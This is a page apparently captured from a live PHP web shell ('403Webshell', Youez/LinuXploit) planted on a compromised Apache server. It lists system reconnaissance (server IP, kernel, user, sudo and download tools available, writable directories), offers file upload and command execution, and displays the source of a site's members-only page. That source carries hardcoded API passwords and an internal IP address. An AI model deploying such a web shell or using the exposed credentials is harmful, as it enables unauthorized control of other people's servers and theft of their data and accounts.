403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/fundingapplications.com/membersonly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/fundingapplications.com/membersonly/index_before_daniel.php
<?php
session_start();
if(strstr($_SERVER['REMOTE_ADDR'],'74.211.31') !== false) {
	die(); //74.211.31.213 dustin's office ip
}
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/globals.php');  
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/AuthLCAPI.php');

//Member Authentication Object
$auth = new AuthLCAPI;

if(!$auth->isLoggedIn()) {
	header('location: '.$auth->loginPageUrl);
	exit();
} 
	$body_id = 'member_side';
?>
<?php include($_SERVER['DOCUMENT_ROOT'].'/header.php');?>
<table border="0" cellspacing="0" cellpadding="10" style="background:white;">
	<tr>
		<td style="width:200px;vertical-align:top;">
			<?php include($_SERVER['DOCUMENT_ROOT'].'/membersonly/nav.php');?>
		</td>
		<td style="vertical-align:top;">
			<div id="site_feedback" style="clear:right; margin: 20px 0 0 15px; float: right;" >
				<?php
				if(!empty($_SESSION['user_subscriptions']['id_2'])) {
					echo file_get_contents("http://thegrantresearchdatabase.com/get_some_grants.php?pass=LemmeIN&site=nusaf&client_id=".$_SESSION['user_subscriptions']['id_2']['user_id']);
				} else {
					echo file_get_contents("http://thegrantresearchdatabase.com/get_some_grants.php?upsell=1&pass=LemmeIN&site=nusaf&client_id=".$_SESSION['user_subscriptions']['id_2']['user_id']);
				}
				?>
			</div>
			<p class="title_blue">Welcome to Funding Applications.com</p>
    
    
    <?php
	$xml = simplexml_load_file('http://cms.surfercrm.com/api/contents/view/1051/.xml?user=syncrm&pass=5007crm');
	echo $xml->content[0]->data;
	?>
    
		</td>	
	</tr>
</table>	
<?php include('footer.php');?>


Youez - 2016 - github.com/yon3zu
LinuXploit